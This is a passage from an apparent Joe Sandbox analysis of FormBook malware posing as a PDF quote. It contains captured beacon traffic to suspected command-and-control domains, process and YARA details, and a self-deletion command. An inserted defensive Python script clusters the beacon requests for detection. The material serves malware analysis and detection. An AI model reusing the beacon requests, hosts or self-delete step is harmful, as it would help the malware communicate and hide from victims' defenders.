                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      8 | 192.168.2.4 | 49778 | 216.239.36.21 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Apr 8, 2021 13:23:12.007415056 CEST | 6616 | OUT | GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.rootedwithlovejax.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:23:12.111870050 CEST | 6617 | IN | HTTP/1.1 200 OK
                                                                      Content-Type: text/html; charset=utf-8
                                                                      x-ua-compatible: IE=edge
                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                      Date: Thu, 08 Apr 2021 11:23:12 GMT
                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Oq+MhZLqXn/lPJa2HbfaPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Server: ESF
                                                                      X-XSS-Protection: 0
                                                                      X-Content-Type-Options: nosniff
                                                                      Set-Cookie: NID=213=Q3aVk287agnix_VFlLOZ9f8yZ4NKvZ3Gx5T2uq5mhBEDndQJtvlbSmgVWdWVA_Limzw7UVlmkJM_oISIIEOzBYUYzRN8LDbRdzqogH-Cod8rdzxLYiDXnWMd0mCWh91iRVLe-oo4zLEtKedf1mnoB2xzK3tMk489BX8pYT_Q7Ho; expires=Fri, 08-Oct-2021 11:23:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                      Accept-Ranges: none
                                                                      Vary: Accept-Encoding
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 4f 71 2b 4d 68 5a 4c 71 58 6e 2f 6c 50 4a 61 32 48 62 66 61 50 67 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 22 45 50 31 79 6b 64 22 3a 5b 22 2f 5f 2f 2a 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73
                                                                      Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/LocalBusiness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="Oq+MhZLqXn/lPJa2HbfaPg">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.google.com","EP1ykd":["/_/*","/local/business
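
Added example, not part of the Joe Sandbox report. The eight sessions above all come from C:\Windows\explorer.exe and share one request shape: the path /pe0r/, a changing jfIla4= value, an unchanging Yn=ybIHhf989FGTI0, seven 0x00 bytes recorded after the headers and Connection: close, sent to eight unrelated Host values in under a minute. The script below groups captured requests by process, method, path and parameter-name set and reports a group once it reaches a configurable number of distinct hosts, naming the parameters whose value never changes and flagging GETs that carried trailing bytes. The request list is copied from the sessions above; the browser.exe control request and the three-host threshold are constructed assumptions for this illustration.

```python
"""Cluster captured HTTP requests to flag the multi-host beaconing seen above.

Added example, not part of the Joe Sandbox report. CAPTURED is copied from the
eight explorer.exe sessions in the report; the final browser.exe request is a
constructed benign control, and MIN_HOSTS is an assumed detection threshold.
"""
from collections import defaultdict

# Hosts and jfIla4 values copied from the report; Yn is identical in all eight requests.
_BEACON_HOSTS = [
    ("www.luegomusic.com", "DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO"),
    ("www.kf350.com", "EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/"),
    ("www.pierresplayhouse.com", "gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV"),
    ("www.thecapitalhut.com", "Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn"),
    ("www.ssfgasia.com", "edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ"),
    ("www.desertfoxindustries.com", "z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau"),
    ("www.tennesseewheelrepair.com", "k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O"),
    ("www.rootedwithlovejax.com", "RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL"),
]

# (process, method, Host header, request target, bytes recorded after the request headers)
CAPTURED = [
    ("C:\\Windows\\explorer.exe", "GET", host,
     "/pe0r/?jfIla4=%s&Yn=ybIHhf989FGTI0" % value, b"\x00" * 7)
    for host, value in _BEACON_HOSTS
] + [
    # Constructed benign control request (assumption): one host, no trailing bytes.
    ("C:\\Program Files\\browser.exe", "GET", "www.example.com", "/index.html?lang=en", b""),
]

MIN_HOSTS = 3  # assumed threshold: same request shape against this many unrelated hosts


def parse_target(target):
    """Split a request target into its path and ordered raw (name, value) pairs.

    Values are deliberately not percent-decoded, so base64-like data containing
    '+' and '/' is compared exactly as it was sent on the wire."""
    path, sep, query = target.partition("?")
    params = []
    if sep:
        for pair in query.split("&"):
            if pair:
                name, _, value = pair.partition("=")
                params.append((name, value))
    return path, params


def find_beacon_clusters(requests, min_hosts=MIN_HOSTS):
    """Group requests by (process, method, path, parameter-name set) and return
    every group that reaches min_hosts distinct Host headers.

    Each finding lists the hosts (a ready-made block list), the parameters whose
    value never changed across hosts (a fixed identifier), and whether a GET
    carried bytes after its headers, which a browser-issued GET does not."""
    groups = defaultdict(list)
    for process, method, host, target, trailing in requests:
        path, params = parse_target(target)
        names = tuple(sorted(name for name, _ in params))
        groups[(process, method, path, names)].append((host, dict(params), trailing))

    findings = []
    for (process, method, path, names), entries in groups.items():
        hosts = sorted({host for host, _, _ in entries})
        if len(hosts) < min_hosts:
            continue
        constant = {}
        for name in names:
            values = {params[name] for _, params, _ in entries}
            if len(values) == 1:
                constant[name] = values.pop()
        findings.append({
            "process": process,
            "method": method,
            "path": path,
            "hosts": hosts,
            "constant_params": constant,
            "get_with_trailing_bytes": method == "GET" and any(t for _, _, t in entries),
        })
    return findings


if __name__ == "__main__":
    for finding in find_beacon_clusters(CAPTURED):
        print("%s %s %s against %d hosts; constant params %s; GET with trailing bytes: %s"
              % (finding["process"], finding["method"], finding["path"],
                 len(finding["hosts"]), finding["constant_params"],
                 finding["get_with_trailing_bytes"]))
        for host in finding["hosts"]:
            print("   ", host)
```

Run against the copied sessions, the script reports a single cluster of eight hosts for explorer.exe with Yn as the only constant parameter; the control request stays below the threshold. Raising min_hosts to nine suppresses the finding, which is the knob to tune against real proxy logs where CDN-fronted sites legitimately share a path.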


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      System Behavior

                                                                      General

                                                                      Start time:13:21:19
                                                                      Start date:08/04/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x7ffabd480000
                                                                      File size:397431 bytes
                                                                      MD5 hash:98F9EA244308BB5969EA3C302C32EFCD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:13:21:20
                                                                      Start date:08/04/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x7ffabd480000
                                                                      File size:397431 bytes
                                                                      MD5 hash:98F9EA244308BB5969EA3C302C32EFCD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:13:21:25
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:13:21:38
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\SysWOW64\control.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                                      Imagebase:0xe70000
                                                                      File size:114688 bytes
                                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:13:21:43
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:13:21:43
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis
